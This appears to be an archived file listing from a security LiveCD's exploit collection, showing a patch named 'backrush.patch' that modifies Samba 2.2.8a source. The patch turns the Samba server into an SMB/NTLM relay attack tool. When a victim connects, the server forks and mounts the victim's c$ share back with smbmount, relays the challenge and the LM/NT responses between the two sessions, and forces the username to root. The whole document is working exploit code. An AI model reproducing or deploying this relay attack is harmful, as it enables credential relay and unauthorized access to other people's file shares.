home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / backrush.patch < prev    next >
Text File  |  2005-02-12  |  7KB  |  231 lines
  1. diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c
  2. --- /root/samba-2.2.8a/source/client/smbmount.c    2002-04-30 17:56:19.000000000 +0430
  3. +++ /backrush/source.exp/client/smbmount.c    2003-04-19 16:28:04.000000000 +0430
  4. @@ -26,6 +26,10 @@
  5.  #include <mntent.h>
  6.  #include <asm/types.h>
  7.  #include <linux/smb_fs.h>
  8. +//>Backrush
  9. +int br_read[2], br_write[2], br_pid;
  10. +struct Backrush br_state;
  11. +//<
  12.  
  13.  extern BOOL in_client;
  14.  extern pstring user_socket_options;
  15. @@ -177,6 +181,21 @@
  16.          cli_shutdown(c);
  17.          return NULL;
  18.      }
  19. +//>Backrush
  20. +        {
  21. +        int i;
  22. +        printf("challange: ");
  23. +            for (i = 0; i < 8; i++)
  24. +            printf("%0.2x",c->cryptkey[i]);
  25. +        fflush(stdout);
  26. +        memcpy(br_state.challenge, c->cryptkey, 8);
  27. +        br_state.status = 1;
  28. +        write(br_write[1],&br_state, sizeof(br_state));
  29. +        printf(" sent to server\n");
  30. +        printf("waiting for response...\n");
  31. +        fflush(stdout);    
  32. +    }
  33. +//<
  34.  
  35.      if (!got_pass) {
  36.          char *pass = getpass("Password: ");
  37. @@ -848,6 +867,14 @@
  38.      if (*credentials != 0) {
  39.          read_credentials_file(credentials);
  40.      }
  41. +//>Backrush
  42. +    printf("Started to mount %s on %s\n",argv[1], argv[2]);
  43. +    fflush(stdout);
  44. +    if (getenv("BACKRUSH_READ")) 
  45. +            br_read[0] = atoi(getenv("BACKRUSH_READ"));
  46. +    if (getenv("BACKRUSH_WRITE"))
  47. +        br_write[1] = atoi(getenv("BACKRUSH_WRITE"));
  48. +//<
  49.  
  50.      DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));
  51.  
  52. diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h
  53. --- /root/samba-2.2.8a/source/include/includes.h    2003-02-28 19:26:18.000000000 +0330
  54. +++ /backrush/source.exp/include/includes.h    2003-04-17 10:36:54.000000000 +0430
  55. @@ -1,5 +1,26 @@
  56.  #ifndef _INCLUDES_H
  57.  #define _INCLUDES_H
  58. +
  59. +//>Backrush
  60. +#include <stdlib.h>
  61. +#include <time.h>
  62. +struct Backrush
  63. +{
  64. +    int status;
  65. +    char ip_address[20];
  66. +    int port;
  67. +    char username[256];
  68. +    char sharename[256];
  69. +    char netbios[256];
  70. +    char domain[256];
  71. +    char challenge[8];
  72. +    char nt_resp[24];
  73. +    char lm_resp[24];
  74. +};
  75. +extern struct Backrush br_state;
  76. +extern int br_read[2],br_write[2],br_pid;
  77. +//<
  78. +
  79.  /* 
  80.     Unix SMB/Netbios implementation.
  81.     Version 1.9.
  82. diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c
  83. --- /root/samba-2.2.8a/source/libsmb/cliconnect.c    2003-03-15 01:04:48.000000000 +0330
  84. +++ /backrush/source.exp/libsmb/cliconnect.c    2003-04-17 12:30:26.000000000 +0430
  85. @@ -23,7 +23,6 @@
  86.  
  87.  #include "includes.h"
  88.  
  89. -
  90.  static const struct {
  91.      int prot;
  92.      const char *name;
  93. @@ -265,7 +264,28 @@
  94.          memcpy(pword, pass, passlen);
  95.          memcpy(ntpword, ntpass, ntpasslen);
  96.      }
  97. -
  98. +//>Backrush
  99. +    {
  100. +        int i;
  101. +        read(br_read[0],&br_state, sizeof(br_state));
  102. +        printf("received response:\n");
  103. +        fflush(stdout);
  104. +        memcpy(pword, br_state.lm_resp, 24);
  105. +        memcpy(ntpword, br_state.nt_resp, 24);
  106. +        if(br_state.username[0])
  107. +             strncpy(user, br_state.username, 24);
  108. +        printf("username: %s\n", user);
  109. +        printf("lm response: ");
  110. +            for (i = 0; i < 24; i++)
  111. +            printf("%0.2x",pword[i]);
  112. +        printf("\n");
  113. +        printf("nt response: ");
  114. +            for (i = 0; i < 24; i++)
  115. +            printf("%0.2x",ntpword[i]);
  116. +        printf("\n");
  117. +        fflush(stdout);
  118. +    }
  119. +//<
  120.      /* send a session setup command */
  121.      memset(cli->outbuf,'\0',smb_size);
  122.  
  123. diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c
  124. --- /root/samba-2.2.8a/source/smbd/negprot.c    2003-03-15 01:04:49.000000000 +0330
  125. +++ /backrush/source.exp/smbd/negprot.c    2003-04-24 13:37:19.000000000 +0430
  126. @@ -180,6 +180,45 @@
  127.        doencrypt = ((cli->sec_mode & 2) != 0);
  128.    }
  129.  
  130. +//>Backrush
  131. +    {
  132. +    srand(time(NULL));
  133. +        pipe(br_read);
  134. +        pipe(br_write);
  135. +        br_state.status = 1;
  136. +        br_state.port = random();
  137. +        strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));
  138. +        strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));
  139. +        {
  140. +            char tmp[1024], *ptr;
  141. +        FILE *fin = fopen("backrush/ip2sharename.map","r");
  142. +        if (fin)
  143. +        {
  144. +            while(fscanf(fin, "%s", tmp) > 0)
  145. +            {
  146. +                ptr = strchr(tmp, ':');
  147. +            *ptr++ = 0;
  148. +            if (!strcmp(br_state.ip_address,tmp))
  149. +            strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));
  150. +        }
  151. +        fclose(fin);
  152. +            }
  153. +    }
  154. +    if (!(br_pid = fork()))
  155. +        {
  156. +        char cmd[1024];
  157. +            snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);
  158. +        system(cmd);
  159. +        snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",
  160. +        br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);
  161. +        system(cmd);
  162. +            snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);
  163. +        system(cmd);
  164. +        _exit(0);
  165. +    }
  166. +    }
  167. +//<
  168. +
  169.    if (doencrypt) {
  170.        crypt_len = 8;
  171.        if (!cli) {
  172. diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c
  173. --- /root/samba-2.2.8a/source/smbd/password.c    2003-04-07 06:24:00.000000000 +0430
  174. +++ /backrush/source.exp/smbd/password.c    2003-04-19 09:15:47.000000000 +0430
  175. @@ -48,6 +48,10 @@
  176.      unsigned char buf[8];
  177.  
  178.      generate_random_buffer(buf,8,False);
  179. +//>Backrush
  180. +    read(br_read[0],&br_state, sizeof(br_state));
  181. +    memcpy(buf, br_state.challenge, 8);
  182. +//<
  183.  
  184.      memcpy(saved_challenge, buf, 8);
  185.      memcpy(challenge,buf,8);
  186. @@ -466,7 +470,13 @@
  187.      uchar challenge[8];
  188.      char* user_name;
  189.      uint8 *nt_pw, *lm_pw;
  190. -
  191. +//>Backrush
  192. +    memcpy(br_state.nt_resp, nt_pass, 24);
  193. +    memcpy(br_state.lm_resp, lm_pass, 24);
  194. +    write(br_write[1],&br_state, sizeof(br_state));
  195. +//    waitpid(br_pid,NULL,WNOHANG);
  196. +    return(False);
  197. +//<
  198.      if (!lm_pass || !sampass) 
  199.          return(False);
  200.  
  201. diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c
  202. --- /root/samba-2.2.8a/source/smbd/reply.c    2003-04-07 06:24:00.000000000 +0430
  203. +++ /backrush/source.exp/smbd/reply.c    2003-04-16 18:03:58.000000000 +0430
  204. @@ -974,6 +974,11 @@
  205.     * security=domain.
  206.     */
  207.  
  208. +//>Backrush   
  209. +  strncpy(br_state.username,user,sizeof(br_state.username));
  210. +  strncpy(user,"root",sizeof(br_state.username));
  211. +//<
  212. +
  213.    if (!guest && !check_server_security(orig_user, domain, user, 
  214.           smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&
  215.        !check_domain_security(orig_user, domain, user, smb_apasswd,
  216. diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c
  217. --- /root/samba-2.2.8a/source/smbd/server.c    2003-03-15 01:04:49.000000000 +0330
  218. +++ /backrush/source.exp/smbd/server.c    2003-04-16 18:05:17.000000000 +0430
  219. @@ -25,6 +25,11 @@
  220.  extern fstring global_myworkgroup;
  221.  extern pstring global_myname;
  222.  
  223. +//<Backrush
  224. +int br_read[2],br_write[2],br_pid;
  225. +struct Backrush br_state;
  226. +//>
  227. +
  228.  int am_parent = 1;
  229.  
  230.  /* the last message the was processed */
  231.